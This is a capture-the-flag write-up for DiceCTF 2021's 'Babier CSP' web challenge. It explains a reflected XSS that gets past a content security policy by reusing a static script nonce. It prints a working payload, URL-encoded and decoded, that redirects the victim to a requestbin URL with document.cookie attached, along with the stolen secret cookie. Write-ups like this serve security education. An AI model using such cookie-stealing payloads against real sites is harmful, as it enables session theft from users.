Rating: 4.5

# Babier CSP - (349 Solves/107 Points)

```
Baby CSP was too hard for us, try Babier CSP.

babier-csp.dicec.tf #Challenge site

https://us-east1-dicegang.cloudfunctions.net/ctf-2021-admin-bot?challenge=babier-csp #Admin bot
The admin will set a cookie secret equal to config.secret in index.js.
```

We are given an `index.js` which contains the source code for the NodeJS backend. This challenge hints quite strongly at **XSS** since we have to **steal a cookie** which has the **location of config.secret** `app.use('/' + SECRET, express.static(__dirname + "/secret"));` and presumably contains the flag.

The webpage is fairly simple, with a "`View Fruit`" link that chooses from 1 of the 4 fruits `"apple", "orange", "pineapple", "pear`, passes it through a **GET request** and renders it on the page itself as part of `${name}`.

```html
const template = name => `
<html>

${name === '' ? '': `<h1>${name}</h1>`}
View Fruit

<script nonce=${NONCE}>
elem.onclick = () => {
location = "/?name=" + encodeURIComponent(["apple", "orange", "pineapple", "pear"][Math.floor(4 * Math.random())]);
}
</script>

</html>
`;
```

We quickly realise that we can put **any HTML into `${name}`**, and hence this is vulnerable to **XSS**.

However, there is also a **`nonce`** which complicates things slightly, since **only script tags which have `nonce` will be allowed to run**, and **inline running of JS is disabled**. Thankfully, the `nonce` is a **constant**: `const NONCE = crypto.randomBytes(16).toString('base64');` and we can very easily extract the nonce from the page source:

```
nonce-LRGWAXOY98Es0zz0QOVmag==
```

But, there is yet another measure we need to resolve: the **Content-Security-Policy (CSP)**.

```javascript
res.setHeader("Content-Security-Policy", `default-src none; script-src 'nonce-${NONCE}';`);
```

When we try to run any fetch statements, we will realise that `default-src none;` **blocks any fetch**. However, one way to circumvent this is to use `location.href` instead to **redirect the user along with the cookie**. Hence, our payload will look something like this:

```bash
https://babier-csp.dicec.tf/?name=%3Cscript%20nonce=LRGWAXOY98Es0zz0QOVmag==%3Elocation.href=%22https://requestbin.io/1lb35x71?data=%22%2Bdocument.cookie%3C/script%3E
#URL-Encoded

#URL-Decoded
https://babier-csp.dicec.tf/?name=<script nonce=LRGWAXOY98Es0zz0QOVmag==>location.href="https://requestbin.io/1lb35x71?data="+document.cookie</script>
```

Sending this via the `Admin Bot`, we get the cookie in our RequestBin:

```
secret=4b36b1b8e47f761263796b1defd80745
```

Visiting the site `https://babier-csp.dicec.tf/4b36b1b8e47f761263796b1defd80745/`, we get the flag in the source code:

```html

```

Original writeup (https://github.com/IRS-Cybersec/ctfdump/tree/master/DiceGang%202021/web-Babier%20CSP).